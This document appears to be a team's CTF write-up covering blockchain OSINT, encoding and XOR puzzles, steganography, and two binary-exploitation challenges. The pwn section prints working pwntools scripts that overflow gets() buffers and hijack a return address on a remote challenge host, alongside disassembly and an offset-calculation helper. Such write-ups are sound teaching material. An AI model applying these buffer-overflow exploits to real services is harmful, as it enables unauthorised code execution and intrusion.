USIU CTF
We were not lucky enough to finish first, but we were content with what we managed.
Access the challenges via https://usiu.ciphercode.dev/challenges
Blockchain
WannaCry one — Address
Some OSINT was required for this one. I went to the browser and searched `Which address has transacted the most in WannaCry?` and got something really accurate; the flag was the address, so the flag is Aspire{12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw}
WannaCry two — Exit
We were tasked with finding the address that was sent 9.03851401 BTC in August 2017. Using the blockchain explorer link I found while looking for the first address, I started going through the previous transactions and was able to get the address that received the BTC, like DAMN, all that money 🥲
FLAG : Aspire{16dfTuSx4f78eQ81PzTgBtBDyZ7QhNZ8Vy}
Ether one — Publisher
This was kinda easy. Given the address, we were to find the flag that was published at some point, but notice that it's a smart contract deployed on the Ethereum Rinkeby testnet. So the first thing I did was visit the Rinkeby TestNet Explorer and search the address, which gave a list of transactions made by it; I decided to check each of them and look at the logs.
The first logs gave nothing useful, so I kept checking the rest of the transactions, and when I reached the 10th transaction it gave the flag.
Ether two — Function
Given an address, we are told that it has a function that returns the flag, interesting! I searched the address on the Rinkeby testnet explorer and got just the history of when the contract was created, so I checked the contract tab and decompiled its bytecode, since the hint says there is a function which returns the flag.
I then went back to the transaction hash, checked the input data and converted it from hex to UTF-8, and got the flag:
Aspire{Solidity you gotta love it}
Cryptographic Basics
Decoder one — Hex
Easy peasy... there is a site I know of that does this kind of conversion, pretty cool (CyberChef).
Decoder two — ON/OFF
Using that same site we can easily convert these binary numbers to their ASCII equivalent.
Decoder three — Feel
⠁⠎⠏⠊⠗⠑{⠛⠗⠕⠕⠧⠑⠎⠀⠁⠝⠙⠀⠗⠊⠙⠛⠑⠎}
This is braille... we use that same site to convert it to its ASCII equivalent.
Decoder six — md5
This challenge demanded a little thinking... We finally brute-forced the values using hashcat.
Decoder four — Mod
Following the instructions on the challenge we can write a script for it.
#!/usr/bin/python3
print("Niwai flag tu ...")

# the numbers given in the challenge
values = [381, 369, 388, 376, 405, 377, 387, 405, 396, 398, 398, 402, 405, 371, 373, 400, 395, 370, 395, 369]
# the 37-symbol alphabet from the challenge; each value mod 41 is an index into it
table = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '_']

flag = []
for i in values:
    j = i % 41          # never reaches 37 or more for these inputs, so the index is always valid
    flag.append(table[j])
print("Aspire{" + ''.join(flag) + "}")
Decoder five — XOR
First I opted to find the key using the first 7 bytes of plaintext that I know (Aspire{). I used a script for this:
#!/usr/bin/python3
from pwn import *

text = bytes.fromhex('2416150c17001e23090c1545110d0045071c11001618')
# XOR the ciphertext against the known prefix; the first 7 bytes of the result are the key stream
key = xor(text, b'Aspire{')
print("The key is:", key)
# use the key obtained (first part of the bytes output) to decrypt the encrypted flag
Having the key, I headed to the XOR Calculator site to calculate the flag.
So we get the part of the flag we didn't have... Flag: Aspire{bytes}
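As an added example (not from the original write-up, and without pwntools), here is the same known-plaintext attack carried through end to end: XOR the known prefix Aspire{ against the ciphertext to expose the key stream, collapse it to its shortest repeating period, and decrypt the whole message with it.

```python
# Added example, not the write-up's own script: recover a repeating XOR key from a
# known plaintext prefix, then decrypt the full ciphertext. Pure Python, runs offline.
from itertools import cycle

# Ciphertext taken from the challenge and the flag prefix every flag shares.
CIPHERTEXT = bytes.fromhex("2416150c17001e23090c1545110d0045071c11001618")
KNOWN_PREFIX = b"Aspire{"


def recover_key(ciphertext: bytes, known: bytes) -> bytes:
    """XOR the known plaintext against the ciphertext to expose the key stream,
    then shrink it to the shortest period that reproduces the whole stream."""
    stream = bytes(c ^ k for c, k in zip(ciphertext, known))
    for period in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % period] for i in range(len(stream))):
            return stream[:period]
    return stream  # unreachable: period == len(stream) always matches


def xor_decrypt(ciphertext: bytes, key: bytes) -> bytes:
    """Apply the key cyclically; XOR is its own inverse, so this also encrypts."""
    return bytes(c ^ k for c, k in zip(ciphertext, cycle(key)))


def solve(ciphertext: bytes = CIPHERTEXT, known: bytes = KNOWN_PREFIX) -> tuple[bytes, str]:
    """Return (recovered key, decrypted text) for the challenge ciphertext."""
    key = recover_key(ciphertext, known)
    plain = xor_decrypt(ciphertext, key)
    return key, plain.decode("ascii", errors="replace")


if __name__ == "__main__":
    key, flag = solve()
    print("key:", key)
    print("flag:", flag)
```

The period is only observable inside the 7 known bytes, so a key longer than the known prefix comes back truncated; for this challenge the key stream is a single repeated byte.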
Steganography
Stego one — Cover your base
This was pretty simple. I found the flag in the metadata of the picture, encoded with base64.
Stego three — Face the music
Here you download the sound file, then decode it (Morse Code Adaptive Audio Decoder).
Stego five — Right and Wrong
First you use binwalk to extract the extra data.
Use the xxd command to view the hexadecimal of the files extracted, where we find a date in every file.
So I wrote a bash script to get all those values from the 16 extracted files, and this is what I got.
So using CyberChef I converted this to its ASCII equivalent and boom, I had the flag.
Stego four — Heading to success
Going straight to how I solved this challenge... let's check the hexadecimal dump of the file using the xxd command. We see something juicy.
Look at that.. I know, it's what we both thought... an image embedded in the image we have. Let's make use of an online site I know that helps with this kind of stuff (HexEd.it).
So we should copy the hex values starting from USIU and make a new file, then give it a PNG file header, that is, replace the USIU bytes with those of the PNG file header.
Therefore we should change those first values to :
Perfect. Let's export the file now.
Now we have a QR image to scan.. I used this site (QR Code Scanner).
Reverse
Pwn one — Buffer
*************************************************************** FUNCTION ***************************************************************
undefined main()
undefined AL:1 <RETURN>
undefined1 Stack[-0x9]:1 local_9 XREF[2]: 00401162(W),
00401177(R)
undefined1 Stack[-0x78]:1 local_78 XREF[1]: 00401166(*)
main XREF[5]: Entry Point(*),
_start:00401088(*),
_start:00401088(*), 00402038,
004020d0(*)
00401156 f3 0f 1e fa ENDBR64
0040115a 55 PUSH RBP
0040115b 48 89 e5 MOV RBP,RSP
0040115e 48 83 ec 70 SUB RSP,0x70
00401162 c6 45 ff 00 MOV byte ptr [RBP + local_9],0x0
00401166 48 8d 45 90 LEA RAX=>local_78,[RBP + -0x70]
0040116a 48 89 c7 MOV RDI,RAX
0040116d b8 00 00 00 00 MOV EAX,0x0
00401172 e8 e9 fe ff ff CALL <EXTERNAL>::gets char * gets(char * __s)
00401177 80 7d ff 4d CMP byte ptr [RBP + local_9],0x4d
0040117b 75 0a JNZ LAB_00401187
0040117d b8 00 00 00 00 MOV EAX,0x0
00401182 e8 07 00 00 00 CALL get_flag undefined get_flag()
LAB_00401187 XREF[1]: 0040117b(j)
00401187 b8 00 00 00 00 MOV EAX,0x0
0040118c c9 LEAVE
0040118d c3 RET
Ignore most of the stuff and concentrate on the main parts. There is a gets function, which is dangerous since it doesn't limit the size of the input. After that, the variable at [RBP + local_9], declared earlier and initialised to 0x0, is compared to 0x4d. We know 0x4d is the hexadecimal representation of M.
Therefore, when the condition is false the program exits; otherwise the function get_flag is called :)
Now that we have the logic, let's solve it. We have to overflow into that variable with the character "M", taking the little-endianness into account (p64(0x4d) puts the 0x4d byte first). Just by checking the assembly of the binary we can see the size of the buffer: local_78 sits at RBP-0x70 and local_9 at RBP-0x1, so 111 bytes of input reach it. I quickly wrote a script for this.
#!/usr/bin/python3
from pwn import *

p = remote("159.223.7.179", 5000)
payload = b"\x90" * 111     # fill the 0x6f bytes between local_78 and local_9
payload += p64(0x4d)        # 'M' lands on local_9 (little-endian: the 0x4d byte goes first)
p.sendline(payload)
p.interactive()
And boom, I got a shell.
Pwn two — Jump
This was easier using objdump.
objdump -d jump -M intel
I saw a function get_flag(), so all I had to do was take control of the instruction pointer by overwriting the function's return address and jump to get_flag(). First things first, let's get the offset. I like doing it manually and then writing a script afterwards.
Getting the offset was easy peasy.. Now let's write a script.
#!/usr/bin/python3
from pwn import *

p = remote("159.223.7.179", 5001)
print(p.recv())
ret = p64(0x4011ab)                 # address of get_flag()
offset = 120                        # bytes from the buffer start to the saved return address
payload = b"\x90" * offset + ret
p.sendline(payload)
p.interactive()
Now we got a shell.
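An added example, not part of the original write-up: a small parser for the Stack[-N] variable lines in the Ghidra listing above that works out how many bytes of input separate the gets() buffer from each local, the saved RBP and the return address. It reproduces the 111 used in the Buffer script and, assuming the jump binary's buffer also sits at Stack[-0x78] (an assumption, since its listing is not shown), the 120 used in the Jump script.

```python
# Added example, not from the write-up: compute overflow distances from a Ghidra listing.
# Ghidra's Stack[-N] offsets are relative to the stack pointer at function entry, where
# the return address is at Stack[0x0]; after PUSH RBP the saved RBP is at Stack[-0x8],
# which is why [RBP + local_9] assembles to [RBP-1] for Stack[-0x9].
import re

# The two stack-variable lines copied from the write-up's listing of main() in "Buffer".
LISTING = """
undefined1 Stack[-0x9]:1 local_9 XREF[2]: 00401162(W),
undefined1 Stack[-0x78]:1 local_78 XREF[1]: 00401166(*)
"""

STACK_VAR = re.compile(r"Stack\[(-?0x[0-9a-fA-F]+)\]:(\d+)\s+(\w+)")


def parse_stack_vars(listing: str) -> dict[str, tuple[int, int]]:
    """Map each local's name to (offset from entry SP, size in bytes)."""
    return {
        m.group(3): (int(m.group(1), 16), int(m.group(2)))
        for m in STACK_VAR.finditer(listing)
    }


def distances_from(buffer_name: str, listing: str) -> dict[str, int]:
    """Bytes of input needed to reach the first byte of every target that lies
    above the buffer: the other locals, the saved RBP and the return address."""
    stack_vars = parse_stack_vars(listing)
    base = stack_vars[buffer_name][0]
    targets = {name: off for name, (off, _) in stack_vars.items() if name != buffer_name}
    targets["saved_rbp"] = -0x8      # pushed by PUSH RBP in the prologue
    targets["return_address"] = 0x0  # pushed by the CALL into main
    return {name: off - base for name, off in targets.items() if off > base}


if __name__ == "__main__":
    for name, dist in sorted(distances_from("local_78", LISTING).items(), key=lambda kv: kv[1]):
        print(f"{name:>16}: {dist} bytes ({dist:#x})")
```

Anything the parser reports as lying above the buffer is what an unbounded gets() can clobber, which is also the list a reviewer wants when deciding whether a bounded read (fgets with sizeof the buffer) fully closes the hole.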
Thanks for your time :)
Contact us:
Check our hackmd.io blogs too :)
( trustie_rity )
( tahaafarooq )
Our Twitter accounts are below, follow us :)
trustie_rity
nighthawk
muchiemma
Tahaafarooq